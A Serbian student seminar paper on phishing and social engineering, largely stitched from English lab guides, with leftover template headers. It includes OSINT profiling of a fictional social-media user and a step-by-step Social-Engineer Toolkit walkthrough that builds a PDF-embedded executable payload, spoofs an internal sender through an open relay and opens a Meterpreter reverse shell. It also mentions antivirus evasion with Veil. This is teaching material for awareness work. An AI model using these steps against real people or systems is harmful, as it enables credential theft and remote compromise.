Professional Documents
Culture Documents
Etika
Etika
SEMINARSKI RAD:
Napad ličnih podataka na Internetu
kroz demonstraciju fišinga i
socijalnog inžinjeringa
STUDENT:
SADRŽAJ:
1 Uvod................................................................................................................................................. 9
2 NAPADI KONCEPTI I TEHNIKE......................................................................................................... 10
3 TIPOVI MALICIOZNOG SOFTVERA...................................................................................................13
3.1 SIMPTOMI ZLONAMERNOG SOFTVERA................................................................................................14
4 SOCIJALNI INŽINJERING.................................................................................................................. 15
4.2 Social Engineering Reconnaissance......................................................................................................16
Introduction............................................................................................................................................16
Exam Objectives.................................................................................................................................16
Lab Diagram.......................................................................................................................................16
Connecting to your lab.......................................................................................................................17
Exercise 1 - Social Engineering Reconnaissance..................................................................................18
Task 1 - Log into MyBook..................................................................................................................18
Step 1................................................................................................................................................18
Task 2 - Exploring and Gathering Information...............................................................................19
Step 1................................................................................................................................................19
Step 2................................................................................................................................................19
Step 3................................................................................................................................................21
Step 4................................................................................................................................................22
Step 5................................................................................................................................................23
Summary.................................................................................................................................................25
5 IMPLEMENTACIJA........................................................................................................................... 26
5.1 Generate Phishing Exploit using SET.....................................................................................................27
Scenario...........................................................................................................................................................27
5.1.1 Open Phishing Attachment...........................................................................................................34
5.1.2 Generate Phishing Awareness Email.............................................................................................40
5.2 socijalni inžinjering – implentacija........................................................................................................47
Introduction............................................................................................................................................47
Learning Outcomes................................................................................................................................47
Exam Objectives.....................................................................................................................................48
Lab Duration...........................................................................................................................................48
Help and Support...................................................................................................................................48
Projektni zadatak: Naziv projektnog zadatka2
Ime i prezime, br.index
CS450 – Cloud Computing
Lab Topology..........................................................................................................................................48
5.2.1 Exercise 1- Social Engineering Types and Techniques...................................................................50
Learning Outcomes................................................................................................................................51
Task 1 - Know the Basic Components of Social Engineering..........................................................51
Elicitation.........................................................................................................................................51
Interrogation....................................................................................................................................51
Pretexting.........................................................................................................................................52
Task 2 - Know the Motivation Techniques.......................................................................................52
Task 3 - Know Phishing and Its Types..............................................................................................52
Reasons for Successful Phishing Attacks........................................................................................53
Types of Phishing Attacks................................................................................................................54
Task 4 - Know Hoax, Baiting, Shoulder Surfing, and Tailgating....................................................54
Hoax.................................................................................................................................................54
Shoulder Surfing.............................................................................................................................55
Baiting..............................................................................................................................................55
Tailgating.........................................................................................................................................55
5.2.2 Exercise 2 - Using the Social-Engineer Toolkit (SET)......................................................................56
Learning Outcomes................................................................................................................................56
Your Devices...........................................................................................................................................56
Task 1 - Create a Malicious Payload.................................................................................................56
Step 1................................................................................................................................................57
Step 2................................................................................................................................................59
Step 3................................................................................................................................................61
Step 4................................................................................................................................................63
Step 5................................................................................................................................................65
Step 6................................................................................................................................................67
Step 7................................................................................................................................................69
Step 8................................................................................................................................................71
Step 9................................................................................................................................................73
Step 10..............................................................................................................................................75
Step 11..............................................................................................................................................77
Task 2 - Copy the File to the User’s System......................................................................................79
Step 1................................................................................................................................................79
Step 2................................................................................................................................................81
SPISAK SLIKA:
1 UVOD
U ovom radu pokriveni su načini pomoću kojeg stručnjaci za sigurnost na Internetu analiziraju šta se dogodilo
nakon sajber napada. Objašnjavaju se ranjivosti softverskog i hardverskog softvera i različite kategorije
sigurnosnih propusta koji mogu uticati na ugrožavanje ličnih podataka.
Razgovara se o različitim vrstama zlonamernog softvera (poznatom kao zlonamerni softver) i simptomima
zlonamernog softvera. Obuhvaćeni su različiti načini na koji se napadači mogu infiltrirati u sistem, kao i napadi
uskraćivanja usluge.
Većina savremenih sajber napada kombininuje različite tehnike napada. Kombinovani napadi koriste više
tehnika za infiltraciju i napad u sistem. Kada napad nije moguće sprečiti, posao profesionalca za sajber
bezbednost je da smanji uticaj tog napada.
Softverske ranjivosti
Softverske ranjivosti se obično uvode greškama u operativnom sistemu ili kodu aplikacije, uprkos svim
naporima koje kompanije ulažu u pronalaženje i krpanje softverskih ranjivosti, uobičajeno je da nove
ranjivosti isplivaju na površinu. Microsoft, Apple i drugi proizvođači operativnog sistema gotovo
svakodnevno objavljuju zakrpe i ispravke. Ažuriranja aplikacija su takođe česta. Aplikacije poput veb
pregledača, aplikacija za mobilne uređaje i veb servera često ažuriraju kompanije ili organizacije
odgovorne za njih.
U 2015. godini u Cisco IOS-u je otkrivena glavna ranjivost, nazvana SINful Knock. Ova ranjivost je
omogućila napadačima da steknu kontrolu nad usmerivačima korporativnog nivoa, kao što su zastareli
usmerivači Cisco 1841, 2811 i 3825. Tada su napadači mogli nadgledati svu mrežnu komunikaciju i
imali su mogućnost da zaraze druge mrežne uređaje. Ova ranjivost je uvedena u sistem kada je
izmenjena IOS verzija instalirana u rutere. Da biste to izbegli, uvek proverite integritet preuzete IOS
slike i ograničite fizički pristup opreme samo ovlašćenom osoblju.
Cilj ažuriranja softvera je da budu u toku i izbegnu eksploataciju ranjivosti. Iako neke kompanije imaju
timove za testiranje penetracije posvećene pretraživanju, pronalaženju i popravljanju ranjivosti
softvera pre nego što mogu da se iskoriste, nezavisni istraživači bezbednosti takođe su se
specijalizovali za pronalaženje ranjivosti u softveru.
Google-ov Project Zero je sjajan primer takve prakse. Nakon što je otkrio brojne ranjivosti u raznim
softverima koje koriste krajnji korisnici, Google je formirao stalni tim posvećen pronalaženju
softverskih ranjivosti. Google bezbednosna istraživanja možete pronaći ovde.
Hardverske ranjivosti
Hardverske ranjivosti često uvode nedostaci u dizajnu hardvera. Na primer, RAM memorija je u osnovi
kondenzatori instalirani vrlo blizu jedan drugog. Otkriveno je da bi zbog blizine stalne promene
primenjene na jednom od ovih kondenzatora mogle uticati na susedne kondenzatore. Na osnovu te
dizajnerske mane stvoren je ekploit nazvan Rovhammer. Uzastopnim prepisivanjem memorije na iste
adrese, Rovhammer ekploit omogućava preuzimanje podataka iz obližnjih ćelija memorije adresa, čak
i ako su ćelije zaštićene.
Buffer overflow - Ova ranjivost se javlja kada se podaci zapisuju izvan granica bufera. Baferi su
memorijska područja dodijeljena aplikaciji. Promenom podataka izvan granica bafera, aplikacija
pristupa memoriji dodeljenoj drugim procesima. To može dovesti do pada sistema, ugrožavanja
podataka ili eskalacije privilegija.
Nevalidisani unos - programi često rade sa unosom podataka. Ovi podaci koji ulaze u program mogu
imati zlonamerni sadržaj, dizajniran da prisili program na neželjeno ponašanje. Razmotrite program
koji prima sliku na obradu. Zlonamerni korisnik može da napravi datoteku slike sa nevažećim
dimenzijama slike. Zlonamerno napravljene dimenzije mogu primorati program da dodeli bafere
netačnih i neočekivanih veličina.
Uslovi trke (Race conditions)- Ova ranjivost je kada izlaz događaja zavisi od uređenih ili vremenskih
rezultata. Uslovi trke postaju izvor ranjivosti kada se zahtevani uređeni ili vremenski određeni
događaji ne dogode u pravilnom redosledu ili u odgovarajućem vremenu.
Slabosti u bezbednosnim praksama - Sistemi i osetljivi podaci mogu se zaštititi tehnikama kao što su
potvrda identiteta, autorizacija i šifrovanje. Programeri ne bi trebalo da pokušavaju da kreiraju
sopstvene bezbednosne algoritme jer će to verovatno uvesti ranjivosti. Toplo se savetuje da
programeri koriste sigurnosne biblioteke koje su već kreirane, testirane i verifikovane.
Problemi sa kontrolom pristupa - kontrola pristupa je proces kontrole ko šta radi i kreće se od
upravljanja fizičkim pristupom opremi do diktiranja ko ima pristup resursu, kao što je datoteka, i šta
mogu sa njom učiniti, kao što je čitanje ili promena fajl. Mnoge sigurnosne ranjivosti nastaju
nepravilnom upotrebom kontrola pristupa.
Gotovo sve kontrole pristupa i sigurnosne prakse mogu se prevazići ako napadač ima fizički pristup
ciljanoj opremi. Na primer, bez obzira na to na šta ste postavili dozvole za datoteku, operativni sistem
ne može sprečiti nekoga da zaobiđe operativni sistem i pročita podatke direktno sa diska. Da bi se
zaštitila mašina i podaci koje sadrži, fizički pristup mora biti ograničen, a tehnike šifrovanja moraju biti
zaštićene od krađe ili oštećenja podataka
Kratko od zlonamernog softvera, zlonamerni softver je bilo koji kod koji se može koristiti za krađu podataka,
zaobilaženje kontrola pristupa ili nanošenje štete sistemu ili kompromitovanje. Ispod je nekoliko tipičnih vrsta
malvera:
Špijunski softver - Ovaj malver je dizajniran za praćenje i špijuniranje korisnika. Špijunski softver često uključuje
tragače aktivnosti, prikupljanje pritiska tastera i prikupljanje podataka. U pokušaju da prevaziđe mere
bezbednosti, špijunski softver često modifikuje sigurnosna podešavanja. Špijunski softver se često pakuje sa
legitimnim softverom ili sa trojanskim konjima.
Advare - Softver podržan oglašavanjem dizajniran je za automatsko prikazivanje oglasa. Advare se često
instalira sa nekim verzijama softvera. Neki advare je dizajniran da isporučuje samo reklame, ali takođe je
uobičajeno da advare dolazi sa špijunskim softverom.
Bot - Od reči robot, bot je zlonamerni softver dizajniran da automatski izvršava radnju, obično na mreži. Iako je
većina botova bezopasna, jedna sve veća upotreba zlonamernih botova su bot mreže. Nekoliko računara je
zaraženo botovima koji su programirani da mirno čekaju naredbe napadača.
Ransomvare - Ovaj zlonamerni softver dizajniran je da drži računarski sistem ili podatke koje sadrži kao
zatvorene dok se ne izvrši uplata. Ransomvare obično radi tako što šifrira podatke u računaru pomoću
nepoznatog ključa za korisnika. Neke druge verzije ransomvare-a mogu iskoristiti određene sistemske ranjivosti
da zaključaju sistem. Ransomvare se širi preuzetom datotekom ili nekom softverskom ranjivošću.
Scarevare - Ovo je vrsta zlonamernog softvera dizajnirana da nagovori korisnika da preduzme određenu radnju
zasnovanu na strahu. Scarevare pravi skočne prozore koji liče na prozore dijaloga operativnog sistema. Ovi
prozori prenose falsifikovane poruke u kojima se navodi da je sistem u opasnosti ili da treba izvršenje
određenog programa da bi se vratio u normalan rad. U stvarnosti, nisu procenjeni ili otkriveni nikakvi problemi i
ako se korisnik složi i odobri da se pomenuti program izvrši, njegov sistem će biti zaražen malverom.
Rootkit - Ovaj zlonamerni softver dizajniran je da modifikuje operativni sistem kako bi stvorio pozadinsku
mrežu. Napadači zatim koriste backdoor za daljinski pristup računaru. Većina rootkitova koristi prednosti
softverskih ranjivosti za eskalaciju privilegija i modifikovanje sistemskih datoteka. Takođe je uobičajeno da
rootkitovi modifikuju sistemsku forenziku i alate za nadgledanje, čineći ih veoma teškim za otkrivanje. Često se
računar zaražen rootkitom-om mora izbrisati i ponovo instalirati.
Virus - Virus je zlonamerni izvršni kod koji je povezan sa drugim izvršnim datotekama, često legitimnim
programima. Većina virusa zahteva aktivaciju krajnjeg korisnika i može se aktivirati u određeno vreme ili datum.
Virusi mogu biti bezopasni i jednostavno prikazuju sliku ili mogu biti destruktivni, poput onih koji modifikuju ili
brišu podatke. Virusi se takođe mogu programirati da mutiraju kako bi se izbeglo otkrivanje. Većinu virusa sada
šire USB uređaji, optički diskovi, mrežni delovi ili e-pošta.
Trojanski konj - trojanski konj je zlonamerni softver koji izvodi zlonamerne operacije pod maskom željene
operacije. Ovaj zlonamerni kod koristi privilegije korisnika koji ga pokreće. Trojanci se često nalaze u
datotekama slika, audio datotekama ili igrama. Trojanski konj se razlikuje od virusa jer se vezuje za neizvršne
datoteke.
Crvi - Crvi su zlonamerni kod koji se repliciraju samostalnim iskorišćavanjem ranjivosti u mrežama. Crvi obično
usporavaju mreže. Dok virus zahteva pokretanje programa domaćina, crvi se mogu pokrenuti sami. Osim
početne infekcije, oni više ne zahtevaju učešće korisnika. Nakon zaraze domaćina, crv se može vrlo brzo
proširiti mrežom. Crvi imaju slične obrasce. Svi oni imaju ranjivost koja omogućava, način za širenje sebe i svi
sadrže korisni teret.
Crvi su odgovorni za neke od najrazornijih napada na Internetu. Kao što je prikazano na slici 1, crv Code Red je
2001. godine zarazio 658 servera. U roku od 19 sati, crv je zarazio preko 300 000 servera, kao što je prikazano
na slici 2.
Čovek u sredini (MitM) - MitM omogućava napadaču da preuzme kontrolu nad uređajem bez znanja korisnika.
Sa tim nivoom pristupa, napadač može presresti i uhvatiti korisničke podatke pre nego što ih prenese na
odredište. MitM napadi se široko koriste za krađu finansijskih informacija. Postoji mnogo zlonamernog softvera
i tehnika koje napadačima pružaju MitM mogućnosti.
Čovek u mobilnom (MitMo) - Varijacija čoveka u sredini, MitMo je vrsta napada koja se koristi za preuzimanje
kontrole nad mobilnim uređajem. Kada se zarazi, mobilnom uređaju se može naložiti da eksfiltrira korisnički
osetljive informacije i pošalje ih napadačima. ZeuS, primer eksploatacije sa MitMo mogućnostima, omogućava
napadačima tiho hvatanje SMS poruka za verifikaciju u 2 koraka poslatih korisnicima.
Bez obzira na vrstu malvera kojim je sistem zaražen, ovo su uobičajeni simptomi malvera:
Datoteke su izmenjene.
Datoteke se brišu.
4 SOCIJALNI INŽINJERING
Socijalni inženjering je pristupni napad koji pokušava da manipuliše pojedincima da izvršavaju radnje ili
otkrivaju poverljive informacije. Socijalni inženjeri se često oslanjaju na spremnost ljudi da budu od pomoći, ali
takođe plene i na njihove slabosti. Na primer, napadač bi mogao da pozove ovlašćenog zaposlenog sa hitnim
problemom koji zahteva trenutni pristup mreži. Napadač se mogao žaliti na ispraznost zaposlenog, pozivati se
na autoritet pomoću tehnika uklanjanja imena ili se žaliti na pohlepu zaposlenog.
Predtekstovanje - Ovo je slučaj kada napadač pozove pojedinca i laže ga u pokušaju da dobije pristup
privilegovanim podacima. Primer uključuje napadača koji se pretvara da su mu potrebni lični ili finansijski
podaci da bi potvrdio identitet primaoca.
Praćenje - Ovo je slučaj kada napadač brzo sledi ovlašćenu osobu na sigurno mesto.
Nešto za nešto (Kuid pro kuo) - Ovo je slučaj kada napadač zahteva lične podatke od stranke u zamenu za
nešto, poput besplatnog poklona.
Probijanje Wi-Fi lozinke je postupak otkrivanja lozinke koja se koristi za zaštitu bežične mreže. Evo nekoliko
tehnika koje se koriste u probijanju lozinki:
Socijalni inženjering - Napadač manipuliše osobom koja zna lozinku kako bi je pružio.
Napadi grubom silom - Napadač pokušava nekoliko mogućih lozinki u pokušaju da pogodi lozinku. Na primer,
ako je lozinka četvorocifreni broj, napadač bi morao da isproba svaku od 10000 kombinacija. Napadi grube sile
obično uključuju datoteku sa spiskom reči. Ovo je tekstualna datoteka koja sadrži spisak reči preuzetih iz
rečnika. Program zatim pokušava svaku reč i uobičajene kombinacije. Budući da napadima grube sile treba
vremena, složenim lozinkama treba mnogo više vremena da se pogodi. Nekoliko alata za grubu silu lozinki
uključuju Ophcrack, L0phtCrack, THC Hidra, RainbovCrack i Medusa.
Njuškanje mreže - slušajući i hvatajući pakete poslane na mreži, napadač će možda moći da otkrije lozinku ako
se lozinka šalje nešifrirano (u običnom tekstu). Ako je lozinka šifrirana, napadač će je i dalje moći otkriti pomoću
alata za probijanje lozinki.
4.2
Uvod
Vežba 1 –Izviđanje socijalnog inženjeringa
Zaključak
Uvod
Vreme izvršenja: Ova vežba će trajati otprilike oko 20 minuta.
Ciljevi
Socijalni inženjering
Dijagram
Na slici ispod se može videti topologija mrežne organizacije potrebne za izvršenje ove
vežbe.
Sledi spisak uređaja koji će biti korišćeni, njigovih uloga I pripadajućeg softvera:
Kompromis u kompaniji često započinje tako što napadači pretražuju putem društvenih mreža lične
podatke koji bi im mogli pomoći u sticanju legitimnih detalja ili predstavljanjem te osobe u posao.
Obično je cilj dobiti pristup početnom sistemu koji osoba ili poseduje ili mu ima pristup, a odavde će
napadač pokušati da eskalira i kreće se kroz zgradu ili mrežu dobijajući pristup zanimljivijim
oblastima. U ovoj vežbi izvršiće se sledeći zadaci:
Log na MyBook
Istraživanje I prikupljanje informacija
Ukratko ćemo istražiti neke lične podatke koje bi oni mogli da koriste i tipične detalje koje uvek treba
čuvati pregledom veb lokacije.
Logovanje na MyBook.
Korak 1
http://mybook
Slika 1.2 Screenshot mašine PLABWIN10: MyBook Philip Nomad Timeline stranica
Trenutno, posmatramo Timeline stranicu gde su nedavne aktivnosti u vezi sa životom korisnika javno
postavljene I svako ih može videti.
Prikupljanje informacija je ključni deo koji se koristi u bilo kom napadu; pregledaćemo vrste detalja
koje bi napadač mogao iskoristiti da bi stekao poverenje drugih predstavljajući se na neki način na
Filipa.
Korak 1
Istražujući ovu veb stranicu, malo dalje možemo videti da je Fillip prilično popularan među 1325
sledbenika i da mu je Front End softverski inženjer. To Filipa čini zanimljivom metom s obzirom na to
da vrlo verovatno ima lične podatke koji bi se mogli iskoristiti da prevare kompaniju da pomisli da je
napadač Filip.
Korak 2
Aktivan je član ove stranice sa objavom od pre samo 5 minuta gde je komentarisao tuđu fotografiju i
deli svoj lični album sa prijateljem.
Vidimo da je Phillip oženjen. Obratite pažnju na vrstu odeće na dan venčanja, a lokacija venčanja u
pozadini može biti ključna ako su na venčanje pozvani i kolege sa posla.
Postoje dva prijatelja, Džon i Aleksis, koji su dovoljno bliski Filipu da komentarišu njegove slike i
saznajemo da postoji mogućnost da Filip postane ili jeste i otac bebe.
Scroll nadole.
Zanimljivo je da se Filipov automobil pokvario, ovo bi mogla biti vrlo korisna informacija kada bi
napadač započeo istragu ličnog života Filipa i uspostavio kontakt sa garažom automobila kako bi se
raspitao o vozilu koje Filip vozi.
Korak 3
Figure 1.6 Screenshot PLABWIN10: MyBook Philip Nomad stranica sa bigrafskim podacima
Phillip je ostavio podatke poput broja telefona, datuma rođenja i gde se školovao. Ključne informacije
koje napadači koriste da bi stekli poverenje osoblja koje možda vrši bezbednosne provere. Jedno od
Projektni zadatak: Naziv projektnog zadatka23
Ime i prezime, br.index
CS450 – Cloud Computing
najčešćih korišćenih pitanja je „koji je vaš datum rođenja?“. Sada imamo legitiman odgovor na koji
treba odgovoriti. Da je Filip stvaran, mogli bismo takođe da počnemo da pretražujemo lične podatke na
Univerzitetu Oksford i vidimo da li ćemo dobiti neke pogotke za njega koji pohađa univerzitet, sve
informacije koje pomažu procesu izviđanja.
Slika 1.7 Screenshot PLABWIN10: MyBook Philip Nomad stranica sa bigrafskim podacima
Ovde nam je predstavljeno njegovo prošlo radno iskustvo u radu sa HP-om, a pre toga možemo videti
Kostu. Ponovo bismo mogli da pretražimo HP-ovu stranicu da vidimo šta se otkriva o Filipu; to bi
moglo dovesti napadača do korisnijih informacija kako bi ubedio IT odeljenje da Filipu treba promeniti
lozinku i da li to mogu učiniti umesto njega. Još jedan deo slagalice je moguća lokacija sa sedištem u
kući u Kingstonu na Temzi, često mobilni softver danas popunjava slike ili postove detaljima lokacije
korisnika u trenutku postavljanja.
Korak 4
Ovde primetite da se Filipova pozicija na poslu razvila, on se navodi kao kreativni direktor, koji radi u
Front End Softvare Design-u. Uloga direktora znači neke vrlo važne stvari; Filip ima pristup važnim
resursima i informacijama; njegove lozinke mu verovatno omogućavaju administratorski nivo ili root
pristup domenima ili serverima prepunim podataka koji bi u situacijama poput korporativne špijunaže
mogli biti vrlo unosni. Ovo je album koji je podeljen i možemo videti da on uživa u rejvima,
živopisnim pogledima i možda ima malog psa mopsa, opet klasično pitanje postavljeno u sigurnosnim
pitanjima je „kako je / bilo je ime vašeg prvog ljubimca / pas mačka?" Pored toga, mnogi ljudi koriste
imena svojih kućnih ljubimaca kao lozinke, a datum rođenja za lozinke ili pinove za naloge.
Korak 5
Možemo videti postavljanje Nine Nomad koja bi mogla biti porodična veza, i Lindu koja je takođe
softverski inženjer koji bi mogao raditi sa Filipom, pored toga vidimo Džejmsa koji je izvršni direktor
kompanije koja se zove IT Farm, mogao bi imati radni odnos koji bi mogao biti koristan da biste
saznali više o vrsti posla koji ste obavili i o tome koji je pristup Filip imao IT Farmi.
Sledeća faza koju napadač zahteva je „prijateljstvo“, obično uspostavljanjem lažnog naloga sa
informacijama koje bi Filipa mogle prevariti da ga prihvati, poput pretvaranja da radi na IT Farmi i
korišćenja toga kao opravdanja da Filip pristane na „prijateljstvo“.
Svrha je, naravno, prikupljanje informacija koje dovode do mogućeg phishing napada putem e-pošte
protiv izvršnog direktora IT Farm-a Džejmsa Kartera ili socijalnog inženjera IT / HR odeljenja Google-
a da ih natera da promene Filipovu lozinku koja im omogućava pristup.
Zaključak
Završen je deo zadatka Izviđanje socijalnog inženjeringa.
5 FIŠING
„Pecanje“ je slučaj kada zlonamerna stranka pošalje lažni imejl maskiran da je iz legitimnog, pouzdanog izvora.
Namera poruke je da prevari primaoca da instalira zlonamerni softver na svoj uređaj ili da podeli lične ili
finansijske podatke. Primer krađe identiteta je e-pošta falsifikovana da izgleda kao da ju je poslala
maloprodajna prodavnica u kojoj se od korisnika traži da klikne na vezu da bi zahtevao nagradu. Link može ići
do lažne stranice koja traži lične podatke ili može instalirati virus.
Spear phishing je visoko ciljani phishing napad. Iako krađa identiteta i krađa kopljem koriste e-poštu da bi došli
do žrtava, e-mailovi sa krađom krađe prilagođeni su određenoj osobi. Pre nego što pošalje e-poštu, napadač
istražuje interese cilja. Na primer, napadač sazna da je meta zainteresovana za automobile i da je pokušao da
kupi određeni model automobila. Napadač se pridružuje istom forumu za raspravu automobila gde je meta
član, kova ponudu za prodaju automobila i šalje e-poštu cilju. E-pošta sadrži vezu za slike automobila. Kada cilj
klikne na vezu, zlonamerni softver se instalira na računaru cilja.
6 IMPLEMENTACIJA
Predlog rešenja za unapređenje izabranog poslovnog sistema
Description
CYBRScore's Phishing lab is a premium Cybrary Lab Intended for Intermediate level students and
learners. CYBRScore's Phishing Lab teaches students how to conduct a Phishing simulation and
assessment with the objective of generating awareness among users in order to let Vulnerability
Assessment Analysts be able to visualize those areas and users that could be more vulnerable to a
Social Engineering attack.
CYBRScore's Phishing Lab is targeted toward Vulnerability Assessment Analysts as well as future
cybersecurity workers. Upon successful completion of CYBRScore's Phishing Lab, the student will be
able to Create a Phishing exploit, observe how outside access and compromise is possible, be able to
generate a Phishing awareness e-mail campaign. CYBRScore's Phishing Lab takes approximately 1
hour and 30 minutes to complete.
In CYBRScore's Phishing Lab, students will be able to generate a Phishing exploit using SET (Social
Engineering Tool) to conduct a simulated Phishing attack. Phishing is a key element in any
cybersecurity awareness and an integral part of a Vulnerability Assessment Analyst tool set.
In CYBRScore's Phishing Lab, Students will be able to open the content of an email with a phishing
attachment, download it and thus be able to observe the features and interactions with an open email
session. Learning this process is key for all Vulnerability Assessment Analysts.
In CYBRScore's Phishing Lab, offers students the possibility to learn how to create an awareness
campaign, review and tailor the content of the email that will be sent in order to be more effective
among target users once the campaign has been launched.
CYBRScore's Phishing Lab is part of the Vulnerability Assessment Analyst career path. Completion of
CYBRScore's Phishing Lab means that the student has learned and demonstrated the ability to craft a
Phishing exploit, interact with the exploit, and create a Phishing awareness e-mail. Click on the lab to
start learning a key cybersecurity skill.
Prvi deo ovog poglavlja obuhvata: Kreiranje phishing e-mail, demonstraciju kako phishing e-mailovi mogu da
dozvole pristup spolja i generisanje e-poštu kada se ima svest o phishing-u
U zamošljenom poslovnom sistemu primećeno je da zaposleni otvaraju sve e-poruke u svom poštanskom
sandučetu. Potrebno je zaposlenima u tom preduzeću nadgledati e-poštu. Odlučeno je da se započne
kampanja u kojij će zaposleni unutar organizacije od svojih kolega koji rade u IT službi dobijati fišing mejove i
na taj način će upoznati zaposlene sa opasnostima klika na nepoznate linkove.
Scenario
Per NIST SP800-83:
Phishing refers to use of deceptive computer-based means to trick individuals into disclosing sensitive
personal information. To perform a phishing attack, an attacker creates a Web site or e-mail that looks
as if it is from a well-known organization, such as an online business, credit card company, or financial
institution. The fraudulent e-mails and Web sites are intended to deceive users into disclosing personal
data, usually financial information. For example, phishers might seek usernames and passwords for
online banking sites, as well as bank account numbers.
In this section, we will show how easy it is for an attacker to generate a targeted phishing email using
Kali.
1. Log into the Kali machine using the username root and the password P@ssw0rd
2. Open the Kali Terminal by clicking the terminal icon on the left side of your desktop.
3. Open SET by typing setoolkit and pressing Enter. Press Y to accept the terms of service.
4. Select Option 1 from the menu (Social-Engineering Attacks) by typing the following into
the terminal: 1
5. Select option 1 for Spear-Phishing, then select option 1 to perform a Mass Email Attack
by typing into the terminal 1 for each occurrence.
6. Select Payload 13, which is Adobe PDF Embedded EXE Social Engineering, then select
option 2 to use a built-in Blank PDF for the attack.
8. When prompted for an IP address for your LHOST, enter the IP address of the Kali box,
which is 192.168.1.10. Press Enter to keep the port to connect back to at 443. It will take a few
moments to generate the payload for the exploit.
9. Let's change the filename of the pdf to something different. For now, let's call it
pcfix.zip.pdf
10. Select option 1 to e-mail attack a single email address, then select option 1 again for a
pre-defined template.
11. Select option 4, which will use the Strange internet usage email template. When prompted,
send the email to tsmith@organization.com
12.
13. Next, select option 2 to use your own server or open relay. We're going to spoof an email
from within the company. Enter admin@organization.com as the "From" address. Enter
admin as the FROM NAME that the user will see.
A properly secured email gateway would typically not allow SMTP relay, but open
relays do still occur in the real world.
14. Enter 192.168.1.76 as the SMTP address we'll be attacking. Press Enter to leave the default
SMTP port (25), then type yes to flag the message as high priority.
15. Enter no when it asks if the server supports TLS, then type yes to setup a listener on port
443 to detect if a user clicks the attachment.
1. Using the Resources tab in the right panel of the lab window, switch over to the Windows
10 virtual machine.
2. Log in to your Windows 10 machine using the username Admin and the password
password. We're going to simulate a user clicking the .pdf link that you sent out in the previous
steps.
It has already been configured to receive mail for the tsmith@organization.com account.
4. Click on the email in your inbox from the admin. Click Save at the bottom of the screen.
Read the content of the email. It appears to come from an admin account on the
organization.com domain. It then asks a user to help in fixing a virus outbreak.
6. When prompted in adobe acrobat, accept the license terms. It will ask you to save in order
to extract its contents. Navigate to the Desktop and click the Save button. At the Launch File
prompt, click the Open button.
You may get a message that the command processor has stopped working - this is fine
and your remote session should have still opened on the Kali machine.
7. Switch to your Kali machine. You should see that a Meterpreter session has been opened.
Press Enter to return to a prompt, then type sessions -i 1. This will allow you to interact with
your active meterpreter session. From here an attacker can escalate privileges or install warez.
This section ends with the user being able to interact with a meterpreter shell. This lab is meant to show
you how an attack can leverage a phishing attempt to get a reverse shell. Attackers can use Veil and
other payload obfuscation methods to bypass commercial antivirus.
At many companies, HR and recruiting are prime targets, as it's their job to open attachments from
untrusted sources. These individuals should open untrusted documents in a virtual sandbox when
possible. Adobe specifically has been targeted by a number of 0-day vulnerabilities. When possible,
look to use an alternative PDF viewer (e.g. foxit, Nitro PDF).
2. Open the Security Reminder doc, located in your Documents folder. Read over the
document. This is an example Security Awareness document that may be disseminated to
company employees.
4. Now that we have a better understanding of how phishing works and we've seen an
example security awareness document, we need to draft an email that address phishing threats
to our employees. To save us time, there is a template already created in the Documents folder.
Open Phishing Reminder from the Documents folder and read the contents of the message in
Open Office.
5. Copy the contents of Phishing Reminder.docx. Move back to Thunderbird and select
Write a new message (in the center of the Thunderbird window).
Notice we didn't attach the document to the email. Additionally, plain text email (non
HTML) is a best security practice.
6. In the To: address, enter all@organization.com. The Subject line should read Phishing
Alert. Paste the contents of Phishing Reminder.docx in the body of the email. Press the Send
button when complete.
As part of awareness activities, organizations should educate their users on the techniques that
criminals
use to trick users into disclosing information. Organizations should also provide users with
recommendations for avoiding phishing attacks, which are described in Section 2.8.1. Examples of
such
recommendations are as follows:
Never reply to e-mail requests for financial or personal information. Organizations should not
ask for such information by e-mail, because e-mail is susceptible to monitoring by unauthorized
parties. Instead, call the organization at its legitimate phone number, or type the organization's
known Web site address into a Web browser. Do not use the contact information provided in the
e-mail.
Do not provide passwords, PINs, or other access codes in response to e-mails or unsolicited
popup windows. Only enter such information into the organization's legitimate Web site.
Do not open suspicious e-mail file attachments, even if they come from known senders. If an
unexpected attachment is received, contact the sender (preferably by a method other than e-mail,
such as a phone) to confirm that the attachment is legitimate.
Do not respond to any suspicious or unwanted e-mails. (Asking to have an e-mail address
removed from a malicious party's mailing list confirms the existence and active use of that e-mail
address, potentially leading to additional attack attempts.)
Introduction
Lab Topology
Exercise 1- Social Engineering Types and Techniques
Exercise 2 - Using the Social-Engineer Toolkit (SET)
Exercise 3 - Preventing Social Engineering Exploitation
Review
Introduction
Ethical Hacking
Social Engineering
Social Engineering Toolkit (SET)
Reverse Handler
Payload
PhishTank
Netcraft Toolbar
Welcome to the Social Engineering Practice Lab. In this module, you will be provided with the
instructions and devices needed to develop your hands-on skills.
Learning Outcomes
In this module, you will complete the following exercises:
Note: Our main focus is to cover the practical, hands-on aspects of the exam objectives. We
recommend referring to course material or a search engine to research theoretical topics in more
detail.
Lab Duration
It will take approximately 1 hour to complete this lab.
Lab Topology
During your session, you will have access to the following lab configuration.
Depending on the exercises, you may or may not use all of the devices, but they are shown here in the
layout to get an overall understanding of the topology of the lab.
Social engineering is the art of manipulating and utilizing human behavior to conduct a security breach.
In social engineering, the victim does not realize that they are being used. Users are considered the
weakest link in the security chain and are easy to exploit. The attacker can use various methods in
social engineering to gain sensitive and confidential information causing a security breach. The attacker
can use methods such as sending an E-mail or redirecting the user to a malicious Webpage.
In social engineering, the attacker psychologically manipulates the victim and misdirects them to obtain
the desired information.
Figure 1.1: Diagram showing that social engineering consists of psychology, manipulation, and
misdirection.
Social engineering can be considered as the basis for most forms of passive information gathering
techniques. The outcomes of social engineering can be devastating. With one user as a target in an
organization, the attacker can perform a security breach of the entire network. It is just a matter of
getting inside the network using the information provided by the user.
There can be various types of users who can be the target of social engineering. Some of the common
targets are:
Receptionist
IT Helpdesk
HR department
Top management
Learning Outcomes
After completing this exercise, you will be able to:
Social engineering is a method of extracting valuable information from a person to assist in an attack.
The attacker can use one of the three components of social engineering:
Elicitation
Interrogation
Pretexting
Elicitation
When using elicitation, the attacker extracts the information from the victim without asking direct
questions. Rather, the attacker asks open-ended questions and then keeps narrowing them to the point
that the victim reveals the information. In this process, the victim does not realize that they are giving
valuable information to the attacker.
Interrogation
The attacker interrogates the victim to extract valuable information. However, the attacker needs to be
conscious of asking too many questions, to keep the victim from becoming suspicious of them.
The attacker, other than asking questions, can also observe the victim. For example, the attacker may
pay attention to the following:
Projektni zadatak: Naziv projektnog zadatka53
Ime i prezime, br.index
CS450 – Cloud Computing
Body language
Body gestures - the movement of hands and feet
Facial expressions
Pretexting
